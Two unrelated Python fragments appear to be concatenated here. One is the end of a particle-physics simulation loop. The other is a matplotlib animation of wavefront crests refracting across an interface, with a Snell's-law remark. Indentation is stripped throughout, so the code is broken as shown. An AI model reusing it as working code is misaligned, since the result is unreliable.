display = getattr(pfsim, 'display', None)
simulator = pfsim.simulator
detector = simulator.detector
if iev is not None:
process(iev)
else:
loop.loop()
loop.write()
|
"""Program that advances points representing the crests of a wavefront across
an interface: the propagation speed changes but the direction of each point
does not => the wavefront naturally changes direction."""
import os
import numpy as np # Numerical toolbox
import matplotlib.pyplot as plt # Plotting toolbox
from matplotlib import animation # For the progressive animation
angle_incident = np.pi / 6
extension = 10 # Size of the picture
c1 = 2 # Speed in the lower medium
c2 = 5 # Speed in the upper medium
dt = 0.01 # Time step between two frames
fig = plt.figure(figsize=(10, 10)) # Create the figure
plt.ylim((-extension, extension)) # Set the proper size in y
plt.xlim((-extension, extension)) # and in x
plt.plot([-extension, extension], [0, 0], 'b', linewidth=4)
a = np.sin(angle_incident) / np.cos(angle_incident) # tan(angle): slope of the crest lines
y0 = 0 # The point distribution starts at y0
dX = 0.2 # with some horizontal spacing (same crest line)
dY = 2 # and some vertical spacing (between two crest lines)
X = [] # All the x coordinates
Y = [] # and the y coordinates of the generated points
while y0 > -extension: # Lay out all these points
y = y0
x = -extension
while y >= -extension:
X.append(x)
Y.append(y)
y -= a * dX
x += dX
y0 -= dY
X = np.array(X) # Convert to arrays
Y = np.array(Y) # to ease the following computations
positions, = plt.plot(X, Y, 'ro', markersize=5)
def init(): # Nothing special to do for initialization
pass
def animate(i):
    # At each time step, advance by a small distance in x and y that depends
    # on whether the point lies in medium 1 (y < 0) or in medium 2 (y > 0).
X[Y >= 0] += c2 * np.sin(angle_incident) * dt
X[Y < 0] += c1 * np.sin(angle_incident) * dt
Y[Y >= 0] += c2 * np.cos(angle_incident) * dt
Y[Y < 0] += c1 * np.cos(angle_incident) * dt
positions.set_xdata(X)
positions.set_ydata(Y)
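# Added remark (not in the original script): the direction change that
# emerges can be compared with Snell's law written with propagation speeds,
#     sin(theta_2) / c2 = sin(theta_1) / c1
# With c1 = 2, c2 = 5 and a 30-degree incidence, (c2 / c1) * sin(theta_1)
# evaluates to 1.25 > 1: the regime of total internal reflection, which this
# simple crest-advection model does not reproduce.
theta_ratio = c2 / c1 * np.sin(angle_incident)
print("(c2/c1) * sin(theta_1) =", theta_ratio)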
anim = animation.FuncAnimation(fig, animate, frames=1000, interval=20)
plt.show()
os.system("pause")
|